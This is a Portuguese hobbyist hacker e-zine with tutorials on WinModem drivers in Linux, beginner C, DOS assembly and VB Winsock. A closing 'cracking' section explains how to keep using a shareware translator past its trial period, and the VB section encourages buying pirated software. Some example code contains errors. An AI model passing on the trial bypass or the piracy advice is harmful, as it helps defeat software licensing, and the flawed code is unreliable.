Agora, voce vera como instalar WinModems com o Chipset da PCTEL.

1) Baixe o driver para este dispositivo, vc pode encontrar em 
www.pcchips.com.tw/driver/linux/MODEM/PCTEL.ZIP, ou em algum site 
de sua preferencia.

2) Descompacte o arkivo e em seguida entre no diretorio "/src/module" 
e compile o driver com o comando "make".

3) Agora copie o arkivo "lib/pctel.o" para 
"/lib/modules/(versaun do kernel)/net"

Exemplo:

#cp ../../lib pctel.o /lib/modules/2.4.2/net

4) Em seguida execute os seguintes comandos:

#insmod pctel
#ln /dev/ttyS15 /dev/modem
#mknod /dev/ttyS15 c 62 79

5) Agora adicione a linha "modprobe pctel.o" no arkivo 
"/etc/rc.d/rc.modules". Isso vai fazer com que o ele seja carregado 
automaticamente quando o Linux for iniciado.

Pronto!!! Seu WinModem esta funcioando corretamente!!

Bem pessoal, aki akaba essa materia...espero que ela tenha sido 
util...resolvi escrever ela pq vejo muita gente entrando em canais de 
IRC com duvidas de como instalar WinModems no Linux. Espero que tenha 
solucionado o problema dessas pessoas!! Ateh a proxima!!!


 ___                  .---------------------.                  ___
|   |_________________|                     |_________________|   |
| 8 |_________________|         FIM         |_________________| 8 |
|___|                 |                     |                 |___|
                      `---------------------'                  

  O fim do Cursinho de Linux chegou ao seu fim!! eof!! Espero ter 
ajudado mais uma vez aos iniciantes em linux. 
  Lembre-se: sempre fuce aih no seu sistema.. procure testar cada
programa profundamente e leia muitos howtos.. manpages e tal.. soh
assim voce vai conhecer bastante o LiNuX.
  Entao eh isso, t+!


====================================
Leia abaixo agora o Basico de C III!
==================================== 
                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| -------------------------------------------------------------------|x:.










SETOR [03]
==[ Basico de C III ]==
==[ por Gotoxy      ]==

Neste texto pretendo ensinar algumas coisas bobas que estao na 
minha cabeca e que eu to afim de falar, ou melhor, de ensinar =p
Espero que este ajude a alguns e que seja de suma importancia p/
outros!:) Lembre-se: aprender um pouco mais, eh sempre bom para 
um fucador.

###################
# A funcao atoi() #
###################

Este funcao,com certeza, voce jah deve ter visto exploits. Eh
o seguinte, quando o programa (exploit) pede para vc especificar
um offset, este eh digitado em string, porem, o offset tem q ser
inteiro, entao o que esta funcao faz eh simplesmente transformar
uma string em um inteiro.

Por exemplo:

~$ ./exploit 

Use: exploit offset

~$ ./exploit 100

Esse 100, que eh o offset, eh uma string. Mas, como os offsets
tem que ser numeros inteiros, entao a funcao atoi() converte
o 100, que eh uma string, para um inteiro.

------------------------- ex1.c -------------------------

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
int offset=0;

  if(argc<2){
  printf("Use: %s offset\n",argv[0]);
  exit(0);
  }
if(argc > 1) offset = atoi(argv[1]);
  printf("Offset: %d\n",offset);
  }
---------------------------------------------------------

Compile com: gcc ex1.c -o ex1
Rode-o: ./ex1

Existe varias outras funcoes que convertem valores, algumas
delas sao: atof, atoi, atol, strtod, strtol. Para mais
informacoes sobre cada uma, consule suas manpages.


#####################
# FIFO (named pipe) #
#####################

Vou aproveitar para ensinar neste humilde texto, como voce pode criar
um arquivo fifo no seu sistema.

como identificar um arquivo fifo?

exempluu

~$ cd /tmp
~$ ls

prw-rw-rw-   1 dbz      users           0 Jun  9 12:36 MYFIFO|

|
|
`-- veja esse 'p'.. caso o arkivo tenha ele..pode saber..ele eh um
arkivo fifo!!

um outro jeito de saber eh vendo se o nome do arquivo tem o "|"
(symbol pipe) no final do nome

vamos usar a funcao mknod() para isso..

sintaxe:

int  mknod(  char  *nombre,  mode_t  modo,  dev_t  disp);

essa funcao retorna 0, se caso houve exito..caso ocorra algum erro,
vai retornar -1

exempluu

mknod("/tmp/MYFIFO",  S_IFIFO|0666,  0);

neste caso eu estaria criando o aquivo fifo chamado MYFIFO e q estaria
localizado no diretorio /tmp

ele teria permissao 0666, ou seja, o mesmo q fazer chmod 0666 /tmp/MYFIFO
e como estamos mechendo com permissoes, precisamos declarar a funcao
umask(). Porque? man umask!

veja este exemplo:

--------------------------- fifo.c ---------------------------

#include <sys/types.h>
#include <sys/stat.h>

int main()
{
umask(0);
mknod("/tmp/MYFIFO",  S_IFIFO|0666,  0);
}
--------------------------------------------------------------

Basta compilar com: gcc fifo.c -o fifo
E depois basta executa-lo assim: ./fifo
Agora, entre no diretorio /tmp e veja se o arquivo MYFIFO
foi criado. Espero que tenha sido criado, caso contrario,
voce deve ter feito algo errado..:)


###################
# A funcao feof() #
###################

Na edicao passada, no Basico de C II, esqueci de falar dessa funcao. 
Vou aproveitar para falar dela agora...

Sabemos que EOF (End-of-file) indica o fim de um arquivo. O que
essa funcao faz, eh ver se um arquivo chegou ao seu fim. Ela 
retorna nao-zero se o arquivo aberto chegou ao EOF, caso contrario
ele vai retornar zero.

Sintaxe: int feof (FILE *fp);

Bem, a melhor maneira de deixar isso tudo claro, eh dando um exemplo.
E portanto, abaixo voce encontra um. O que ele faz eh simplesmente
abrir um arquivo e contar quantas linhas ele tem.

-------------------------- le.c --------------------------

#include<stdio.h>
#include<string.h>
#include<stdlib.h>

int main(int argc, char *argv[]){

  FILE *arq;

char le[100];
int cont=0;

if(argc<2){
printf("Use: %s [arquivo]\n",argv[0]);
exit(0);
}
if((arq=fopen(argv[1],"r"))==NULL)
{
  printf("Erro: Arquivo inexistente.\n");
  exit(0);
}

while (!feof(arq))
 {
 fscanf(arq,"%s",le);
 if(le!=" ")
{
cont++;
}
 }
printf("O numero de linhas  %d\n",cont-1);
return 0;
}

----------------------------------------------------------


############################
# Argc e Argv - O que sao? #
############################


Exemplo:

------------- arg.c -------------

int main(int argc, char *argv[])
{
if (argc<2){
   exit(0};
           }
printf("%s %s\n", argv[0],argv[1]);
}
---------------------------------

Acho que soh pelo exemplo voce jah saka como eles funcionam.Mas
para nao haver duvidas, eu vou tentar explicar com minhas proprias
palavras.

ambos (argc e argv) sao argumentos... o 'c' de argC significa count
(argc = argument count) e o o 'v' de argV significa values (argument
values).

o melhor jeito de explicar como usar o argc, eh dando exemplos! Antes
de tudo, resumo: usamos o argc e argv para trabalhar com os argumentos 
na shell.

Exemplo:

int main(int argc, char *argv[])
{
if(argc!=3){
printf("Digite tres argumentos\nExemplo: %s o menino caiu\n",argv[0]);
exit(0);
}
printf("OK!\n");
}

Tipo..ele vai ver se tem tres argumentos digitando na shell!
4 argumentos se fosse contar com o argumento 0 (argv[0]).

see:

%s o menino caiu
 | |   |     |
 | |   |   argumento 3 - argv[3]
 | |  argumento 2 - argv[2]
 | argumento 1 - argv[1]
argumento 0 - argv[0]

caso tenha os tres argumentos digitando na shell, ele vai 
imprimir "OK!" e dar uma quebra de linha! Entendeu? Ahhh,
entao tah blz!:)

e argv eh algo como:

   argv[0] = /bin/sh 
   argv[1] = primeiro argumento digitado na shell
   argv[2] = segundo argumento digitado na shell
   argv[3] = terceiro argumento digitando na shell
   e assim por diante...

entendeu? ok.


###########
# Headers #
###########

Veja:

#include <stdio.h>


Pois eh, isso eh um header.., com execao a diretiva #include, o
header ali eh apenas o stdio.h, q eh a biblioteca de funcoes()
contidas no stdio.h. Todo header tem funcoes, por exemplos:

Bilioteca (ou header): stdio.h
Funcoes: printf(), scanf(), fseek(), etc.

Bilioteca (ou header): stdlib.h
Funcoes: exit(), system(), etc.

Etc...

Acho q todo mundo jah sabe disso... mas o q alguns ainda nao
sabem, eh como criar um header! 

Bem, entao vamos entrar no diretorio /usr/include, aonde 
nossos headers ficam localizados. E dps kriar um novo arkivo,
cujo nome seja teste.h:

~# cd /usr/include
~# vi teste.h

Agora coloque no codigo as seguintes linhas:

/* Inicio */
#include <stdio.h>
#include <stdlib.h>
/* Eof */

Agora saia e salve o arkivo! Depois entre em algum diretorio
aih, aonde voce programa, e dps crie o seguinte programa, cujo
nome seja teste.c (ou outro nome qualquer), e adicione as linhas:

#include <teste.h> /* chamamos o nosso header: teste.h */

main(){
system("/usr/bin/clear");
printf("Hello, World!\n")
}

/* EOF */

Sakaram ?? Isso as vezes eh muito util para um coder,suponhamos
q vc usa 7/ou mais headers sempre em seus programas...aih basta
vc encher o teste.h (como no exemplo) dos headers q vc sempre 
usa e dps quando for fazer seu programa, basta incluir o header
teste.h! Muito util, nao? 

Mas nao eh apenas isso q vc pode fazer!! Voce tb pode criar
funcoes(), entre outras coisas!! Veja um exemplo: crie um
arkivo cujo nome seja teste2.h no diretorio /usr/include e
dps adicione as seguintes linhas no codigo:

/* Begin */

a(){
char nome[30];
printf("Hey!\n");
printf("Digite seu nome: ");
scanf("%s",&nome);
printf("\nOk, bye!\n");
}

/* Eof */

Agora volte no diretorio onde voce programa e crie um arkivo
cujo nome seja teste2.c, e adicione as seguintes linhas:

#include <teste2.h> /* chamamos o nosso header teste2.h */

/* Begin */

int main(){
a(); /* aki nossa funcao */
}

/* Eof */

~# gcc teste2.c -o teste2
~# ./teste2

Viram? Ok. Eh meio dificil criar headers do tipo stdio.h,
stdlib.h, entre outros, pq voce deve ter muita experiencia
em linguagem C. Mas se voce pretende criar algum, eu 
aconselho voce estudar os headers do dir /usr/include.
Entao eh isso amigos.. estudem!!:)

###############
# End of Text #
###############

Proxima edicao 
do ZiNESbr, teremos o Basico de C IV, e aih voce vai estar
aprendendo mais coisas sobre essa fantastica linguagem que
eh a C. 

============================================
Leia abaixo agora o Curso Assembly Parte II!
============================================
                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| -------------------------------------------------------------------|x:.










SETOR [04]
==[ Curso Assembly Parte II ]==
==[ por Gotoxy              ]==

O curso esta voltada aos modelos 80x86 e 80x88, que sao compativeis aos 
processadores Intel e AMD existentes hoje em dia.

Sistema operacional utilizado: MS-DOS

Wow!! Segunda parte tah ai! E espero que ajude em alguma coisa para voce!
Ele esta bem mais completo do que a primeira (apesar de eu nao ter falado
nada no primeiro).

Como eu jah falei, programar em Assembly eh muito vantajoso, pois atraves
dele podemos ter um total controle sobre o SO (sistema operacional).Por
isso que existe virus devastadores, que "atrapalham" a BIOS, a flash ROM,
etc, e assim sendo,prejudicando o funcionamento do seu PC. Isso aih tudo,
entre outras coisas, soh eh possivel porque o Assembly controla todo o
sistema.O cracking tambem! Os crackers, utilizando programas debugadores,
modificam o codigo do programa e assim, mudando a rota do programa.Isso
gracas ao ASM!!!

Escrever programas, complexos, totalmente em Assembly eh uma perca de
tempo. O recomendavel eh voce utilizar as rotinas de asm nos seus programas
escritos em C (ou pascal, etc..). Voce vai ver como fazer isso, entre
outras coisas, num futuro proximo!!

Bem, entao vamos comecar... let's go! =)

Neste texto, pretendo deixar algumas coisas mais claras
para voce, caro amigo fucador, sobre os principais
registradores: AX, BX, CX e DX. No decorrer do texto,
vou mostrar tambem alguns exemplos de como imprimir
coisas na tela, entre outras coisas. 

Mais uma vez, vou estar aqui falando sobre o compilador
que nos vamos utlizar.

* Mingo Assembler *

Eu recomendo voce pegar o Mingo Assembler.Ele eh um otimo compilador de
Assembly.Com ele voce pode fazer varios programas e usar ele nao tem
misterio algum.

Ele foi feito por Eduardo Motta Bhrnheim (a.k.a. Mingo), um otimo
programador e demomaker(que faz DEMOS).

* Onde pega-lo? *

Voce pode encontra-lo no site abaixo:
http://mahome.mingus.cjb.net

* Instalando *

Apos voce dezipar(descompatar) ele, basta executar o Instala.exe
Eu estou com a versao 3.1.5 aqui e portanto existe o Instala.exe
Caso voce esteja com uma nova versao, eh provavel que ainda tenha
o Instala.exe

Se voce prosseguir com a instalacao default(padrao), uma pasta
cujo nome eh Ma sera criada na raiz C:\.

*Obs: isso na versao 3.1.5

* Como usa-lo? *

Usar ele eh como rangar mulher.. facin facin =) Eh soh entrar
no diretorio C:\Ma\Bin e depois executar o Ma.exe. Mas como este
diretorio eh inserido no PATH (veja c:\autoexec.bat), voce pode
executa-lo de qualquer diretorio.

Uma ilustracao segue abaixo:

C:\> cd ma\bin
C:\MA\BIN> ma

MA - Mingo Assembler PRO - V 3.1.5
(c) 1998-2001, Mingus Production
PROFESSIONAL VERSION (FREEWARE)
Eduardo Motta Bhrnheim (a.k.a. Mingo)

Usage: MA [OPTION] [FILE[.ASM]]

OPTION    DESCRIPTION
-?        This help text
-e        EXE files generation

Para gerar arquivos .COM, basta digitar "ma arquivo(.asm)" e para gerar
arquivos .EXE basta digitar "ma -e arquivo(.asm)".


*  Assembly  *

Bem, acho que ja esta na hora de iniciarmos. Lembre-se: este texto eh
apenas para tirar duvidas, pois possui varios exemplos de programas.

E tipo, muitos tutoriais falam muita coisa que confude a cabeca da pessoa
que esta comecando a aprender Assembly. Vou fazer o maximo possivel para
tirar duvidas que ficam na cabeca de cada um.

Como eu jah disse, repito: eh uma grande perda de tempo escrever programas
totalmente escritos em ASM!! Caso saiba C, voce pode implementar no seu
codigo C apenas as rotinas feitas em Assembly.

Pois bem.. vamos iniciar esse mini-mini-cursinho de Assembly! 
Primeiramente, vamos ver os Registradores, que eh uma coisa muito 
simples mas que no inicio eh meio dificil de se entender.

* Registradores *

Para um processador processar dados, eh necessario que ele esteja em
celulas especiais, conhecidos como registradores. Os registradores podem
ser usados sem restricoes!!! Todos os registradores citados abaixo, possui
16 bits. "Mas o que que tem haver os registradores??" - Voce pergunta e eu
respondo: quando estamos trabalhando com assembler, temos que usar
registradores!!!

Como este eh texto bem basico, vou falar apenas dos 4 registradores mais
usados: AX, BX, CX e DX. Esses sao os registradores de uso geral. Os
outros, seguem abaixo:

+  SI -> Source Index      - indice FONTE
+  DI -> Destination Index - indice DESTINO

Ilustracao:

instrucao destino, fonte
            DI      SI

+  SP -> Stack Pointer - Apontador de Pilha(stack)
+  BP -> Base Pointer  - Apontador de Base

+  CS -> Code Segment - Segmento de codigo
+  DS -> Data Segment - Segmento de dados
+  ES -> Extra Data Segment - Segmento de dados extra
+  SS -> Stack Segment - Segmento de pilha(stack)

+  IP -> Instruction Pointer - Apontador de instrucao

+  Flags -> Sinalizadores

Veremos esses registradores em breve!!

##################
# Registrador AX #
##################

AX Registrador Acumulador

   Eh um registrador de 16 bits, ou seja, podemos armazenar um
inteiro positivo de 0 a 65536 ou um inteiro com sinal de -32768 
a 32768.

AH Byte high - Maior byte de AX
AL Byte low  - Menor byte de AX

   Ambos tem 8 bits, ou seja, podem ser usadas para armazenar 256
valores diferentes.

AX tem 16 bits(ou seja, ele eh um registrador de 16 bits), enquanto
AH e AL tem 8 bits. Voce tem que entedender que tudo eh uma coisa s!
Por exemplo, se voce manipular AH, estar manipulando AX ao mesmo tempo.
O que voce tem que entender desse registrador, por enquanto,  eh que ele
eh usado para acumular dados.

Bem,sabemos entao que o X pode ser substituido por L(low) ou H(high), ou
seja, alto(high) e baixo(low).

Esse registrador eh muito usado em operacoes de entrada e saida de dados.
Bem, no decorrer do texto, as coisas vao sendo mais esclarecidas.

Exemplo (ex1.asm):

mov ax, [bx] ;carrega AL com o conteudo da memoria
int 20h      ;isto eh uma interrupcao (veremos isso mais a frente)

Compile ele com o Mingo e depois execute-o com o Debug do Ms-Dos.
Aperte a tecla 'r' e veja o valor de AX e depois aperte a tecla
't' e veja agora como esta o novo valor de AX!! o '[]' eh um modo de
enderecamento, conhecido como Enderecamento Indireto por Registrador!!
Vamos ver isso mais tarde.

Ps: para compilar com Mingo: ma ex1.asm 

##################
# Registrador BX #
##################

BX  Registrador BASE

O registrador BX, tambem possui 16 bits. Ele eh conhecido como registrador
BASE. Assim como no AX, podemos colocar dados na parte alta (high) e baixa
(low) dele (do BX), ou seja, podemos substituir o "X" de BX por H ou L:

  BH  Maior byte de BX
BX    Registrador BASE
  BL  Menor Byte de BX

Exemplo (ex2.asm):

mov bx, 3  ; move 3 para BX
add bx, 5  ; soma o valor atual de BX com 5, ou seja, BX + 5
int 20h    ; volta para o sistema operacional

Teste o programa acima (depois de compilado) com o Debug do Ms-Dos. Para
isso, basta executar o debug e depois apertar a tecla 't'. Voce vai notar
que o valor de BX eh tres, e depois que apertar 't' novamente, o valor
de BX sera 8. Porque isto??? Simples, porque a instrucao ADD soma valores
(iremos ver isso mais a frente, pois talvez algumas pessoas ainda tenham
duvidas relacionada a instrucao ADD).

Ps: para compilar com o mingo: ma ex2.asm


###################
# Registrador CX  #
###################

CX  Registrador Contador

   O registrador CX eh conhecido como o registrador contador (count).
Assim tambem como no AX e no BX, ele possui 16 bits e tambem pode ser
dividido e manipulado em partes:

CH (Counter high) - Para manipularmos na parte alta (8 bits para cima).
CL (Counter Low) - Para manipularmos na parte baixa (8 bits para baixo).

Vamos usar este registrador em situacoes de loop e em desvio de 
condicionais (veremos isso depois!).


##################
# Registrador DX #
##################

DX  Registrador de Dados

  Esse registrador eh o registrador de dados (ohh). Assim como no AX, BX
e no CX, ele possui 16 bits e tambem pode ser dividido e manipulado em
partes:

DH (Data high) - Para manipularmos na parte alta (8 bits para cima).
DL (Data Low) - Para manipularmos na parte baixa (8 bits para baixo).

Usamos muito esse registrador para fazer operacoes aritmeticas, como
MUL (multiplicacao), DIV (divisao), etc.


##########################
Imprimindo strings na tela
##########################

Imprimir strings na tela nao eh tao facil como eh em linguagens de 
programacao de alto nivel, como C e Pascal...mas nao eh tao dificil!
Vamos ver alguns modos de se imprimir "Oi" na tela!!

Em C, teramos algo como:

------------------
#include <conio.h> 
#include <stdio.h>

int main(){
clrscr();
printf("Oi\n");
}
------------------

Em Assembly, teramos:

------------
mov ax,3  
int 10h
mov ah, 2
mov dl,4fh 
int 21h 
mov dl, 69h 
int 21h 
int 20h 
------------

Agora deixe eu explicar linha por linha. Nas duas primeiras linhas, 
temos:

mov ax, 3
int 10h

INT eh uma instrucao especial do Assembly. Nessa duas linhas de
codigo que voce v acima, voce encontra uma INT, e essa INT esta
chamando 10h.. o que eh esse 10h? Sempre que voce quiser que a 
BIOS faca alguma coisa por voce, voce usa a INT 10h 
(ou 16, pois 10h = 16d). Portanto, quando voce quiser que a BIOS
faca alguma coisa voce, voce chama essa interrupcao para que
ele faca alguma coisa. Essa "alguma coisa" eh feita depedendo 
do valor que estiver no registrador. E quando AX tem o valor 3,
e chamamos a interrupcao da BIOS, significa: ajuste o  video
em modo texto colorido e limpe a tela". Voce vai saber mais
sobre interrupcoes depois. 

Entao voce chegou a conclusao que:

mov ax, 3
int 10h

 o mesmo que a funcao

clrscr();

da Linguagem C.


Agora, veja essas tres linhas abaixo:

mov ah, 2
mov dl,4fh 
int 21h 

A interrupcao 21h eh a do MSDOS, ou seja, ela faz multiplas chamadas 
a funcoes DOS. Quando AH esta recebendo 2, e chamamos a INT 21h,
significa: "exiba algo!". E esse algo, deve estar no registrador DL,
e como DL esta recebendo 4fh, que equivale a 'O', entao tudo isso vai
significar: "imprima O na tela!". 

Agora, veja as ultimas tres linhas:

mov dl, 69h 
int 21h 
int 20h 

DL agora esta recebendo 69h, que equivale a i. Perceba que nao eh
necessario repetir o "mov ah, 2" para indicar que vamos imprimir
algo!! E chamamos a interrupcao 21h... o q significa: "imprima i
na tela!". E por ultimo, chamamos a interrupcao 20h, que significa
"Program Terminate", ou seja, volta para o DOS.

Bem.. imprimir strings desse modo, eh muito complicado, pois voce
tem que memorizar o codigo ASCII em Hexadecimal. Tem um programa
muito bom, que tem a lista completa desses codigos. Alem disso,
ele tem otimas dicas em programacao em C e Assembly, entre outras
coisas, vale a pena conferir!! Voce pode fazer o donwload dele em:
http://www.mingus.hpg.com.br/mahome/files/helppc21.zip

Agora eu vou mostrar uma outra maneira, bem mais facil, de se
imprimir strings na tela!! Segue o codigo abaixo:

--------------------------------------
mov ax,3             
int 10h
mov dx, OFFSET texto
mov ah,9
int 21h
int 20h             
texto    db 'Zinesbr!',0Dh,0Ah         
         db '$'
--------------------------------------

Testem! Vao ver que realmente funcionam... veja que por este meio
eh bem mais simples de se imprimir string(s) na tela! 

Agora eu vou explicando linha por linha... as duas primeiras
linhas

mov ax, 3
int 10h

voces jah sabem para que serve? Em caso de duvidas: isso acima
ajusta o video para modo texto e limpa. Agora, veja essa linha:

mov dx, OFFSET texto

Percebe-se que estamos movendo um valor relacionado a 'texto' em DX. 
A pseudo-instrucao 'OFFSET' diz para usar o ENDERECO de texto. Ou seja,
"carregue DX com o endereco de 'texto'". Veremos sobre OFFSETS no
proximo curso de Assembly.

Em Assembly, o unico jeito de se incluir valores eh atraves da instrucao
DB (Defina Byte) e seus parentes (serao vistos no proximo curso). A
instrucao DB reserva na memoria um espaco par se guardar valores de 8
bits (podemos guardar cadeias de caracteres (string(s)) e numeros (dec
ou hex)). Quando estamos reservando valores (ou dados) na memoria, temos
que saber aonde encontra-las... para isso, temos que nomear a posicao 
dos dados, fazemos isso atraves de um Nome simbolico (conhecido como 
label ou rotulo).

Agora as duas seguintes linhas:

mov ah,9
int 21h

Voce j sabe que a interrupcao 21h sao multiplas chamadas/funcoes do
MSDOS. Quando AH eh carregado com 9 e chamaos a trap INT 21h, significa:
"imprima uma string/mensagem cujo inicio eh apontado por DX e terminada
com "$" !". Se o MSDOS nao encontrr esse "$", vai ocorrer um erro e
assim ele (o MSDOS) sera finalizado. A string nao pode ter mais que 64KB,
pois os segmentos dos modelos 8086 possuem no maximo 64KB.

E por ultimo temos:

int 20h             
texto    db 'Zinesbr!',0Dh,0Ah         
         db '$'

A "int 20h", voce ja sabe, finaliza o programa! Mas aih voce pergunta:
" ueh, mas porque o programa eh finalizado antes de imprimir a msg?"

nao eh beeem por aih!! A msg eh chamada nesta instrucao:

mov dx, OFFSET texto

A estamos carregando DX com o ENDERECO de texto, e o ENDERECO de 
texto eh :

texto    db 'Zinesbr!',0Dh,0Ah         
         db '$'

Sako? Blz.


##########################
# Modos de Enderecamento #
##########################

Vou aproveitar aki para falar de duas formas de enderecamento 
(existe outras): Enderecamento por Registro e Enderecamento 
por Imediato. 

 
Enderecamento por Registro
==========================


Sintaxe: MOV Registrador, Registrador

Exemplo:

mov ax, bx

Este eh o enderecamento por registro, ou seja, movemos um
valor de um registrador para o outro. Assim como no exemplo
acima, suponhamos que BX = 10, apos fazermos o "mov ax,bx",
o valor de ax passa a ser igual a 10.

Ahhh! E voce nao pode mover dados de um registrador de 16 
bits para um registrador 8 bits e vice-versa, exemplo:

mov ax, bh

Isto esta errado!


Enderecamento Imediato
======================
 

Sintaxe: MOV Registrador, Imediato

Exemplo:

mov ax, 5

Acima voce v um exemplo de um Enderecamento Imediato, pois
estamos movendo um valor para o Registrador (que no caso eh
o AX). Isso eh como um "AX = 5".


###############
# Finalizando #
###############

Irmaos, espero que tenham aprendido um pouco mais sobre esta
fantastica linguagem de programacao. Apesar de ser um pouco 
complicada, eh bom aprende-la para utiliza-la em rotinas de
seus programas em C (por exemplo), pois assim, seu programa
ficarah mais rapido, entre outras vantagens! Entao t!:) t+  


================================================
Leia abaixo agora um texto sobre Winsocks no VB!
================================================

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| -------------------------------------------------------------------|x:.










SETOR [05]
==[ VB - Winsocks I ]==
==[ por Gotoxy      ]==

VB - Winsocks I


Introducao
----------

Nao vou ensinar como programar em VB, vou apenas ensinar como programar 
usando recursos para internet no VB (Visual Basic), ou seja, utilizando
winsocks!! 

*Obs: se voce nao tem conhecimentos em VB, nao eh recomendavel a leitura 
      deste! mas eh bom ler, para pelo menos ter algumas nocoes basicas.

Eu tenho instalado aqui no meu Win98 o Visual Basic Versao 6.0! Se voce
nao possue ele, recomendo voce procurar no jornal Balcao um kra que grava
Cd's e pedi para ele grava-lo!! Piratear eh a melhor solucao!! Pois se
voce for comprar o CD original, voce vai ter que gastar uma fortuna!! 
muito caro... da ultima vez que eu vi numa loja de informatica aqui, era
mais de mil reais.. puts, q roubo!! Portanto, compre um piratao aih mesmo,
custa na faixa de 15 reais para baixo!!:) agora se tu eh dakeles playbozin
manezao, compre o original!


O que sao Winsocks?
-------------------

Sao os programas responsaveis pela comunicacao ou interligacao de outros 
programas na internet.Quando voce se conecta a um servico qualquer, como 
por exemplo o telnet, voce estah usando um winsock!


Winsocks
--------

Em C temos:

int x; 

A mesma coisa acima, soh que em VB:

dim x as integer; 

Muitas coisas mudam!! O que estou querendo dizer eh que trabalhar com winsocks
em Visual Basic sao completamente diferente do que trabalhar com sockets em
C, portanto, nao pense que soh porque sabe trabalhar com sockets em C sabe
trabalhar com winsocks em VB!! Se voce programa em sockets em C, deve saber
o que eh sockets, como funcionan, deve ter conhecimentos sobre protocolos, 
etc... portanto, use soh este conhecimento, pois sockets sao como winsocks!

Quando estamos programando com winsocks no vb,podemos utilizar tanto o 
protocolo TCP quanto o protocolo UDP. Bem, caso queira aplicacoes mais leves 
como enviar uma pequena quantia de dados, voce pode usar o UDP.. agora se 
quer fazer programas cliente/servidor, etc, vc usa o TCP. 

Caso a Winsock nao esta na 'Paleta de Controle' (um menuzinho que fica do
lado esquerdo do VB), voce deve inclui-la! Basta clicar com botao-direito 
do mouse nessa Paleta de Controle e clicar em 'Components...' e depois 
procurar por 'Microsoft Winsock Control 6.0' e marcar a caixa e depois 
clickar em OK! 

Depos disso, basta colocar a winsock no form(formulario).. depois basta 
colocar se o protocolo utilizado eh TCP ou UDP no source(codigo):


#################
# Protocolo TCP #
#################

'se quiser utilizar o protocolo TCP, o comando segue abaixo:

Winsock1.Protocol = sckTCPProtocol 

#################
# Protocolo UDP #
#################

'mas caso queira utilizar o protocolo UDP:

Winsock1.Protocol = sckUDPProtocol 



'Winsock1' pq foi a primeira inserida.. isso eh definido na propriedade
Name(por default a propriedade Name eh 'winsock1')!
'Protocol' eh a propriedade utilizado para indicarmos o tipo de procolo 
utilizado.

Caso o protocolo usado eh o TCP, voce pode fazer aplicacoes do tipo 
cliente/servidor, que as vezes eh muito util fazer um!! Um exemplo
de um programa que use a aplicacao Cliente/Servidor sao os trojans,
no caso, o server eh uma especie de virus que abre uma porta na makina
vitima, e o cliente eh o programa que vamos conectar no computador
da vitima. 

ex.:
Veja isto:

winsock1.LocalPort = 31337
winsock1.Listen 

Um server de um trojan, como por exemplo o BO (Back Orifice), fica
escutando em uma porta qualquer, desde que ela esteja acima de 1024,
e que nenhuma outra coisa esteja ocupando esta porta! No exemplo acima
voce v que foi setado uma porta, no caso a porta 31337 (essa porta
que o cliente do BO (boserver.exe) utiliza)... setamos uma porta
atraves da propriedade Localport do Winsock!! E o "winsock1.Listen"
foi usado para indicar uma espera por conexao, ou seja, quando 
queremos "aguardar" uma conexao, usamos a propriedade Listen, que 
fica "ouvindo" por conexoes.

Na segunda parte voce vai aprender mais coisas relacionados a 
winsocks, e vai aprender a construir um simples firewall!! Aguarde!:)


Fim da Parte 1
--------------

Na primeira parte, voce aprendeu algumas coisas basicas... a segunda
vai ser lancada na proxima edicao do ZiNESbr! Portanto, aguarde..:) 
Fim.


==========================================
Leia abaixo agora um texto sobre Cracking!
==========================================

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| -------------------------------------------------------------------|x:.










SETOR [06]
==[ Cracker Parte I ]==
==[ por Gotoxy      ]==

##############
# Introducao #
##############

Bem, eu nao curto muito crackear programas shareware, mas sei de algumas
manhas..:) Se alguem quiser mandar uns textos Crackers, o ZiNESbr e seus
leitores agradecem!!

Neste texto aqui eu vou mostrar uma tecnica, de como usar o programa
Traduz Texto Pro 1.2 (para Windows 95 / NT) depois que passa do periodo 
de avaliacao do mesmo.

Isso nao eh bem crackear, pois nao vamos precisar mecher no codigo do
programa (Traduz Tudo), nem no registro do Windows, e nem nada do 
genero!! Mas isso eh uma tecnica Cracker, pois tudo que venha a ser
burlacao de programas, eh crackear!

Eu descobri essa maneira, pois tava querendo traduzir um texto aqui,
mas o perido de avaliacao do Traduz Tudo tinha acabado, entao eu 
procurei pelo crack e nao encontrei nada (confesso q nao procurei
direito) e fui ver como registrava o mesmo e puf!! :P

Bem, deixe entao eu explicar como usar este programa sem precisar
registra-lo para continuar utilizando-o tranquilamente. 

##############
# Crackeando #
##############
  
Primeiramente, utilize o Traduz Tudo...vai usando e usando ele..
dias e dias.. vai traduzindo os textos em ingles aih!! enjoy with 
it !! Bem, depois de um certo prazo, o programa vai comecar a
pedir um numero la de registro ... ateh aih tudo bem!!

aih voce fala: "a nem q porra eu nao kero pagar porra nenhuma
pra usar esse programa q fala q traduz tudo mas q nao traduz
porra nenhuma direito!!"

calma meu amigo!! voce nao vai precisar pagar nada, pq o seu
amigo aki tem uma solucao para voce!!:p 

Vai la!! Entre no Traduz Tudo:

  Iniciar / Programas / Traduz Tudo Pro 1.2 Avaliacao / TraduzTexto

  
Vai pedir o Registro la do programa!! Aih tu clica em 
"Como Registrar..." e espere o seu browser abrir... agora minimize
a janela do seu browser!!

*obs: eh bom voce fazer isso numa hora em que nao esteje conectado
na internet...pq o site la eh um cu vei, muito sinistro...portanto,
recomendo fazer isso quando estiver OFF da net.

bem, depois disso siga os mesmos passos denovo:

  Iniciar / Programas / Traduz Tudo Pro 1.2 Avaliacao / TraduzTexto

e clique em "Como Registrar..." 

Abriu,... certo? Errado!! Falta repetir este passo mais uma vez...
portanto, vamos la:

  Iniciar / Programas / Traduz Tudo Pro 1.2 Avaliacao / TraduzTexto

e clique em "Como Registrar..." 

Apos seguir estes passos acima e o Traduz Tudo vai abrir! Caso nao 
abra (coisa q eu duvido muito de acontecer), tente mais uma vez! 
Aqui eu consegui na terceira tentativa.

Depois disso voce terah o Traduz Tudo aberto e pronto para
usar!!:) 

Muito facil, nao?!



#############
# Conclusao #
#############

Bem, a conclusao que eu chego eh a seguinte: nenhum programa esta
livre de bugs! Falhas e mais falhas sao encontradas diariamente
em Programas!

Quando voce faz um programa, principalmente shareware, voce deve
ter muito cuidado e muita malicia na hora de escrever o seu 
codigo. Encryptar o seu codigo eh muito importante, para assim
evitar que o programa sofra "ataques" de crackers.

Se alguem quiser mandar uma segunda parte de Crack, nos 
agradeceremos muito!!:) 

